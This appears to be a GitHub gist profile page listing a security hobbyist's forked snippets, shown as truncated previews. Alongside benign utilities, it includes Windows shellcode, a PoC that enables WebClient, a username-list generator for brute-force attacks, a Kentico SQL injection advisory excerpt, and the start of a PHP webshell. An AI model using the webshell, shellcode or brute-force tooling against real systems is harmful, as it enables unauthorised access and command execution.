Skip to content

Instantly share code, notes, and snippets.

View Kr0ff's full-sized avatar
:shipit:
What the dog doin' ?

Kr0ff Kr0ff

:shipit:
What the dog doin' ?
113 followers · 374 following
  • Location Unknown
View GitHub Profile
@Kr0ff
Kr0ff / main.cpp
Created February 5, 2025 20:33 — forked from kkent030315/main.cpp
Windows x64 MessageBox Shellcode (434 bytes)
#include <iostream>
#include <Windows.h>
int main()
{
char shellcode[] = "\x48\x83\xEC\x28\x48\x83\xE4\xF0\x48\x8D\x15\x66\x00\x00\x00"
"\x48\x8D\x0D\x52\x00\x00\x00\xE8\x9E\x00\x00\x00\x4C\x8B\xF8"
"\x48\x8D\x0D\x5D\x00\x00\x00\xFF\xD0\x48\x8D\x15\x5F\x00\x00"
"\x00\x48\x8D\x0D\x4D\x00\x00\x00\xE8\x7F\x00\x00\x00\x4D\x33"
"\xC9\x4C\x8D\x05\x61\x00\x00\x00\x48\x8D\x15\x4E\x00\x00\x00"
@Kr0ff
Kr0ff / fuckForticlient.sh
Created December 24, 2024 11:50 — forked from nonamed01/fuckForticlient.sh
fuckForticlient, a command-line client to connect to SAML fortivpn servers by using openfortivpn and the --cookie-in-stdin parameter
#!/bin/bash
# Uncomment the following line to debug the script:
#set -x
#####################################################################################
# fuckForticlient.sh
#
# Script to authenticate against Fortinet SAML servers using Firefox and
# openfortivpn. This replaces Forticlient for GNU/Linux completely.
# Because openfortivpn does not support SAML login (yet), this script uses Firefox
# to authenticate, grabs SVPNCOOKIE and then calls openfortivpn to setup
@Kr0ff
Kr0ff / simple-https-server.py
Created April 21, 2024 12:03 — forked from gh640/simple-https-server.py
Sample: A simple https server with Python for development (Python 3.9+).
"""Simple https server for development."""
import ssl
from http.server import HTTPServer, SimpleHTTPRequestHandler
CERTFILE = './localhost.pem'
def main():
https_server(certfile=CERTFILE)
@Kr0ff
Kr0ff / EtwStartWebClient.cs
Created October 23, 2023 08:48 — forked from klezVirus/EtwStartWebClient.cs
A PoC in C# to enable WebClient Programmatically
using System.Runtime.InteropServices;
using System;
/*
* Simple C# PoC to enable WebClient Service Programmatically
* Based on the C++ version from @tirannido (James Forshaw)
* Twitter: https://twitter.com/tiraniddo
* URL: https://www.tiraniddo.dev/2015/03/starting-webclient-service.html
*
* Compile with:
@Kr0ff
Kr0ff / namemash.py
Last active January 5, 2022 21:51 — forked from superkojiman/namemash.py
Creating a user name list for brute force attacks.
#!/usr/bin/env python
import sys
import os.path
if __name__ == "__main__":
if len(sys.argv) != 2:
print(f"[*] Usage: {sys.argv[0]} names.txt")
sys.exit(0)
if not os.path.exists(sys.argv[1]):
@Kr0ff
Kr0ff / gist:078d5eabbce4c28ea8ef552eb7b011b3
Created March 5, 2021 15:25
Uninstall XQuartz.app from OSX Yosemite/El Capitan/Sierra
launchctl unload /Library/LaunchAgents/org.macosforge.xquartz.startx.plist && \
sudo launchctl unload /Library/LaunchDaemons/org.macosforge.xquartz.privileged_startx.plist && \
sudo rm -rf /opt/X11* /Library/Launch*/org.macosforge.xquartz.* /Applications/Utilities/XQuartz.app /etc/*paths.d/*XQuartz && \
sudo pkgutil --forget org.macosforge.xquartz.pkg && \
rm -rf ~/.serverauth* && rm -rf ~/.Xauthorit* && rm -rf ~/.cache && rm -rf ~/.rnd && \
rm -rf ~/Library/Caches/org.macosforge.xquartz.X11 && rm -rf ~/Library/Logs/X11
@Kr0ff
Kr0ff / simple-https-server.py
Created December 8, 2020 16:47 — forked from dergachev/simple-https-server.py
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.xml with the following command:
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
# python simple-https-server.py
# then in your browser, visit:
# https://localhost:4443
import BaseHTTPServer, SimpleHTTPServer
import ssl
@Kr0ff
Kr0ff / Kentico CMS - 10.0, 11.0 - Multiple Vulnerabilities
Created November 10, 2020 14:19 — forked from zamous/Kentico CMS - 10.0, 11.0 - Multiple Vulnerabilities
Issue title: Authenticated SQL Injection
Description
Some pages in Kentico's administration interface built SQL queries from
user-controlled input in an unsafe manner. Users need specific permissions to
access these pages. However, potential attackers could trick an authenticated
user with sufficient permissions into clicking a malicious link in order to
achieve arbitrary SQL code execution. 
Details
@Kr0ff
Kr0ff / Learning Object Oriented Python.md
Created December 17, 2018 22:19 — forked from briankung/Learning Object Oriented Python.md
Learning Object Oriented Python

Learning Object Oriented Python

I wrote this as a guide for a financial analyst friend of mine looking to learn Python. He is already fairly well versed in doing Project Euler problems in Ruby. All italicized text is for the benefit of any other readers, such as yourself.

Each section is divided into a short resource (10 minutes or less), a long resource (days to weeks or more), and a challenge.

~

So what you're looking to do is to be able to recreate financial models in code. And other types of models. This is a noble pursuit.

@Kr0ff
Kr0ff / easy-simple-php-webshell.php
Created October 9, 2018 19:53 — forked from joswr1ght/easy-simple-php-webshell.php
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if($_GET['cmd'])
{